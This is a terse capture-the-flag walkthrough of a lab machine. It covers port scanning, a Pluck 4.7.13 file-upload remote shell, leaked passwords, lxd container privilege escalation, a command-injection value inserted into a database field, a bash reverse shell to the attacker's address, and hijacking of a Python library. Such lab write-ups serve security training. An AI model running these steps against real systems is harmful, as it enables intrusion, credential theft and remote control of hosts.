Nmap -
> nmap -sVC -T4 10.10.251.54 -oN scans/nmap_initial
# Nmap 7.94 scan initiated Sat Nov 18 14:29:16 2023 as: nmap -v -sC -T4 -sV -oN scans/nmap_initial 10.10.251.54
Nmap scan report for 10.10.251.54
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 76:26:67:a6:b0:08:0e:ed:34:58:5b:4e:77:45:92:57 (RSA)
| 256 52:3a:ad:26:7f:6e:3f:23:f9:e4:ef:e8:5a:c8:42:5c (ECDSA)
|_ 256 71:df:6e:81:f0:80:79:71:a8:da:2e:1e:56:c4:de:bb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 18 14:30:06 2023 -- 1 IP address (1 host up) scanned in 50.69 seconds
Gobuster ( Dir Fuzz Output) -
> gobuster dir -u http://10.10.251.54 -w /usr/share/dirb/wordlists/common.txt -t 20 -o gobust.log
/app (Status: 301) [Size: 310] [--> http://10.10.251.54/app/]
pluck 4.7.13 -> shell.phar file upload rce
http://10.10.250.141/app/pluck-4.7.13/login.php
admin:password
http://10.10.250.141/app/pluck-4.7.13/files/shell.phar
www-data
-> lucien
cd /opt
cat test.py
lucien:HeyLucien#@1999!
group lxd - unintended
on your machine
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
python3 -m http.server 80
- Start a python server, transfer the alpine image to the box
cd /dev/shm; wget <tun0-ip>/alpine-v3.8-i686-20231118_1500.tar.gz
lxd init
lxc image import ./alpine*.tar.gz --alias voldemort
lxc init voldemort hogwarts -c security.privileged=true
lxc config device add hogwarts hogwarts disk source=/home/ path=/mnt/home recursive=true
lxc start hogwarts
lxc exec hogwarts /bin/sh
cd /mnt/home
Intended - history reveals lucien mysql creds
mysql -u lucien -u lucien42DBPASSWORD
use information_schema;
select * from USER_PRIVILEGES;
- lucien got insert / update permission in db
mysql> use library;
mysql> select * from dreams;
+---------+------------------------------------+
| dreamer | dream |
+---------+------------------------------------+
| Alice | Flying in the sky |
| Bob | Exploring ancient ruins |
| Carol | Becoming a successful entrepreneur |
| Dave | Becoming a professional musician |
+---------+------------------------------------+
4 rows in set (0.00 sec)
mysql> Insert into dreams (dreamer,dream) Values ('vold;/tmp/voldemort','n00b');
mysql> exit
```
```
cat << EOF > /tmp/voldemort
#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/<tun0-ip>/1337 0>&1'
EOF
sudo -u death python3 /home/death/getDreams.py
edit /usr/lib/python3.8/shutil.py
cuz death user got write perms
- in
copy2()
function add:
os.system("chmod +rwx /home/morpheus/morpheus_flag.txt");
Thanks for reading<3